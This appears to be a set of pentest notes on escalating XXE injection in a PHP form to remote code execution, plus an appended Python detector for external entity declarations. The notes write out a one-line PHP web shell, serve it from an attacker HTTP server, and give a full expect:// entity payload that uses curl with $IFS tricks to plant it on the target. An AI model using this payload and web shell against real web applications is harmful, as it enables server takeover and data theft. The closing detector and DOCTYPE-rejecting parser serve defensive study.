RCE

The easiest method of gaining RCE with XXE is to look for SSH keys or attempt to use a hash-stealing trick; however, the most efficient method is to fetch a web shell from the attacker's server and write it to the webapp.

#once internal XML entities are confirmed to be processed, use the external entity keyword (SYSTEM) to test for local file disclosure
#find web pages that accept an XML user input
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: 127.0.0.1
 ...
 * submit the expected user input
 
BURP > Proxy > Intercept > Raw
 Request
  ...
  POST /submitDetails.php HTTP/1.1
   <?xml version="1.0" encoding="UTF-8"?>
    <root>
     <name>First</name>
     <tel></tel>
     <email>[email protected]</email>
     <message>This is a test email</message>
    </root>

 * forms that appear to be sending user input in an XML format can be tested for a potential XXE vulnerability
    - the target page may be vulnerable to XXE injection if the user input isn't properly sanitized or safely parsed

#identify which elements are reflected in the response in order to know which elements to inject malicious XML input into
#if no elements are displayed, utilize blind xxe injection method
BURP > Repeater
 Request
  ...
   <?xml version="1.0" encoding="UTF-8"?>
    <root>
     <name>First</name>
     <tel></tel>
     <email>[email protected]</email>
     <message>This is a test email</message>
    </root>
 Response
  ...
  HTTP/1.1 200 OK
   check your email [email protected] for verification...
  
 * the email field is reflected in the response and may be vulnerable to xxe injection
#The expect module is not enabled/installed by default on modern PHP servers, so this attack may not always work

#write a basic web shell to be uploaded to the target via xxe
root@oco:~$ echo '<?php system($_REQUEST["cmd"]);?>' > shell.php
root@oco:~$ sudo python3 -m http.server 8080

#perform test & exploit xxe vulnerability to gain rce
BURP > Repeater
 Request
  ...
  POST /submitDetails.php HTTP/1.1
   <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE email [
    <!ENTITY webShell SYSTEM "expect://curl$IFS-O$IFS'{attackerIP}/shell.php'">
    ]>
    <root>
     <name>First</name>
     <tel></tel>
     <email>&webShell;</email>
     <message>This is a test email</message>
    </root>
    
 * if there is an XXE vulnerability, the XML entity named 'webShell', which is referenced by &webShell;,
   should be replaced with the value defined for it in the DTD
    
 Response
  ...
  HTTP/1.1 200 OK
   check your email testCompany for verification...
   ...
   ...
   
 * all spaces in the command are replaced with $IFS (the shell's internal field separator), and characters that may break the XML format are avoided
    - characters that may break the XML format include |, >, & and {
       - do not use these in the XML payload
 
 * if the HTTP response displays the literal entity reference "&webShell;"
   instead of the entity being resolved (and the webShell file being downloaded), then the webapp isn't vulnerable
   to XXE injection.
   
 * if the XML in the HTTP request declares no DTD, either inline within the XML data or by external reference,
   a DOCTYPE must be added before defining an entity; if a DOCTYPE is already declared in the XML request,
   only the ENTITY declaration needs to be added
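As an added defender-side example (not part of the original notes): a small Python checker that flags the external entity declaration this payload depends on in incoming request bodies, and a parser that refuses any DOCTYPE from clients. The two sample bodies and the attacker.example host are constructed for the demonstration.

```python
import re
import xml.etree.ElementTree as ET
# A DOCTYPE is the only place an entity such as &webShell; can be declared,
# so its presence in client-supplied XML is already a finding.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# <!ENTITY [%] name SYSTEM "uri"> or <!ENTITY [%] name PUBLIC "pubid" "uri">
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<pe>%\s*)?(?P<name>[\w.-]+)\s+"
    r"(?:SYSTEM|PUBLIC\s+(?P<pq>[\"'])[^\"']*(?P=pq))\s+"
    r"(?P<q>[\"'])(?P<uri>.*?)(?P=q)",
    re.IGNORECASE | re.DOTALL,
)

def find_external_entities(body):
    """List external (SYSTEM/PUBLIC) entities declared in an XML body, with the
    URI scheme so a reviewer can spot expect://, php://, file:// and friends."""
    hits = []
    for m in ENTITY_RE.finditer(body):
        uri = m.group("uri")
        scheme = uri.split(":", 1)[0].lower() if ":" in uri else "(relative)"
        hits.append({"name": m.group("name"), "scheme": scheme, "uri": uri,
                     "parameter_entity": m.group("pe") is not None})
    return hits

def parse_untrusted_xml(body):
    """Parse client XML, refusing any DOCTYPE before the parser sees it.
    ElementTree does not resolve external entities, and rejecting the DOCTYPE
    up front also blocks internal-entity expansion (billion laughs)."""
    if DOCTYPE_RE.search(body):
        raise ValueError("DOCTYPE/entity declarations not accepted from clients")
    return ET.fromstring(body.encode("utf-8"))

def is_accepted(body):
    try:
        parse_untrusted_xml(body)
        return True
    except (ValueError, ET.ParseError):
        return False

# Constructed sample bodies modelled on the page's submitDetails.php request.
BENIGN_REQUEST = (
    '<?xml version="1.0" encoding="UTF-8"?>\n<root><name>First</name><tel></tel>'
    "<email>first@example.com</email><message>This is a test email</message></root>"
)
XXE_REQUEST = (
    '<?xml version="1.0" encoding="UTF-8"?>\n<!DOCTYPE email [\n'
    "<!ENTITY webShell SYSTEM \"expect://curl$IFS-O$IFS'attacker.example/shell.php'\">\n"
    "]>\n<root><name>First</name><tel></tel><email>&webShell;</email>"
    "<message>This is a test email</message></root>"
)
```

Running find_external_entities over request logs gives the scheme of every declared entity, which is what distinguishes a file-disclosure probe from the expect:// command-execution attempt shown above.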
